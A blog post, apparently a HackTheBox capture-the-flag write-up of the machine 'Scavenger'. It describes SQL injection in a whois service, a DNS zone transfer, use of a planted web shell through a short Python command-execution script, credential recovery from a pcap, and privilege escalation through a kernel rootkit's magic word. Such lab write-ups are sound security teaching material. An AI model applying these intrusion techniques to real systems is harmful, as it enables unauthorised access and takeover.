Open in app

Sign in

Write

Sign in

HackTheBox — Scavenger

Yan1x0s
9 min readFeb 29, 2020

Greetings folks,
This is gonna be my write-up of Scavenger from HackTheBox.
If you notice that i miss-understood something, let me know please.

https://www.hackthebox.eu/home/machines/profile/202

About the box :

Scavenger is hard-rated machine on HackTheBox. It is one of my favorite boxes.

To sum up, it starts with an SQL injection in the whois service which leaks new subdomains. One of them had a backdoored web service and from there we get access to ftp service and do some forensics to get more users and end up exploiting a rootkit to get root.
To summary, it was a long road but i have learnt a lot.
If you are a sysadmin, i’m sure you will like this machine.

Ompamo, Thanks for this awesome box.

BTW, i didn’t get a shell on this box…

Recon :

I first run an initial nmap scan by invoking the command, saving it to my nmap directory:

nmap -sV -sC -oA nmap/scavenger 10.10.10.155

The result is :

We have 3 ports open.
- 21/FTP : latest version of vsftpd
- 22/SSH : latest version of OpenSSH.
- 25/SMTP : new version of exim smtpd
- 43/WHOIS : nmap couldn’t get banner information of this service
- 53/DNS : new version of ISC BIND service
- 80/HTTP : latest version of Apache web server.

After watching this, i felt like i’m in the intranet area of some company.

Initial foothold :

Of course, i picked the web service to start with :

Error page mentioning that the vhost is needed.
Let’s jump straight to the vhost discovery using gobuster :

Sadly, nothing found…
I went back to web service and scanned for directories and files :

Won’t waste my time here, let’s go check an other service.
I was confused what to choose, watched the open ports again : the WHOIS service is rarely used, i wanted to get in touch with it.

we get no response but there is a referrer to supersechosting.htb

At this point, either this is a waste of time because i get nothing or the domains i’m requesting doesn’t exists in their database !

What ? is it what i’m thinking ?

It is indeed ❤
An SQL injection in the whois service.

Let’s exploit it using UNION query :

1- Find the number of columns queried in the original so that our UNION injection doesn’t fail

So, it’s not 1 column

Great, it’s 2 and the first one is printed.

2- Get database name

3- Get tables

4- Get columns

5- Finally, get values

Cool ! I added the new subdomains to my hosts :D

Web shell backdoor :

First thing first, let’s dig deep :

Initiating an AXFR zone-transfer request using dig command may reveal other subdomains :

Nothing here

Nothing…

Nothing… :(

Yay ! we got sec03

Let’s go back to the web server using the new vhosts.
The only one that worked is the sec03, it was obvious anyway…

Some enumeration

We get redirected to the login page, for each page we visit

It’s a bug tracker service (mantis).
Googled for default credentials

We are in

First thing first, let’s see if we have some known vulns for mantis

Okey, we have some.
Now, let’s find the version

Daaamn it ! forbidden access.
I found that mantis has an API, i tried using to bypass some restriction and find some valuable information.

Couldn’t do anything with it, just browsing the what i could read using the browser

There was a composer and a readme file

Since i didn’t have the version, i didn’t want to try the vulns blindly..

I went desperately looking for other services..

The version we have is newer than this one.
Do we have anonymous access ?

No….
What about the exim (smtp) service ?

Wow, the version we have is 4.89
For the first one :

Authentication is required….
What about the second one ?

We need a phpmailer directory, but we don’t have it…

The third one is just funny xD

For real ? xD

Nothing left…
Let’s exploit the mantis service blindly…

Failed

And failed too =(

I took a step back and re-checked my findings in the cherrytree !

How the hell i didn’t see this !

Maybe i thought that someone else exploited the web server and forgot his shell there.
I restarted the machine to confirm that the file is intended to be there.
And as expected it’s a web shell backdoor !!!

Let’s find the parameter

the name of the parameter is hidden :D

I tried to get a reverse shell but it didn’t work…
Maybe it’s an IPTABLE rule that is blocking us !
The ping worked

But no reverse shell !

I did this little script to facilitate the rce exploitation :

#!/usr/bin/env python3
# -*- coding: utf-8 -*-import requests
import sysURI       = "http://sec03.rentahacker.htb/"
BACKDOOR  = "shell.php"
URL       = URI + BACKDOOR
PARAMETER = "hidden"while True :
        cmd = input("$ ").strip(" \t\n")
        r = requests.get( URL, { PARAMETER : cmd } )
        print(r.text)

So, we got 3 system users (ib01c0X), 1 web user (ib01www), 1 ftp user (ib01ftp).

Getting user :

I struggled surfing the system. Then, i remembered that there is an smtp service.

Checking the mail directory

We get ftp creds :D

We have a note, log file, a pcap file !
Let’s investigate :

Find the attacker footprints :

1- Checked the pcap and found this :

It’s the attacker using the web shell backdoor and running a file named root.c ! What is it ?

It’s a kernel module, let’s save this one for later.

2- export the traffic so that we facilitate the searching phase :

3- strings and grep for pass :

New creds found !

I tried them everywhere :

Ended up to be ftp creds of ib01c01 =)

We got user ^_^

Getting root :

If my assumption is correct : the attacker used the web backdoor to install a rootkit and compromise the whole system.

I didn’t have the knowledge to understand in depth the root.c file.
I googled about it and i found this amazing blog :
https://0x00sec.org/t/kernel-rootkits-getting-your-hands-dirty/1485
I really recommend you to read it !

First we need to enable the module

But where is the ko file ?
I spent time looking for it and i finally found on the ftp home directory hidden under the name of “…”

The attacker used the same module configuration on the blog but he changed one thing, which is the magic word :

In our case, i loaded the file in IDA :

We notice that magic variable was g0tr00t and at the end it was replaced by “g3tPr1v”.

Time to upload the kernel module (wget), load it (insmod), give it right permissions (chmod), exploit it using the device ttyR0

What happened first is after trying to exploit it, the privilege got dropped after the first command. I ended up combining commands with the echo “magic word” to execute command as root.

Voila voila =D

I hoped you learned something ^_^
Thanks for reading =)

Wiw,

#Yan1x0s

Lkm
Whois
Sqli
Dig
Backdoor

--

--

Yan1x0s

Written by Yan1x0s

105 Followers

Talent doesn’t exist. It is the desire of doing things

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams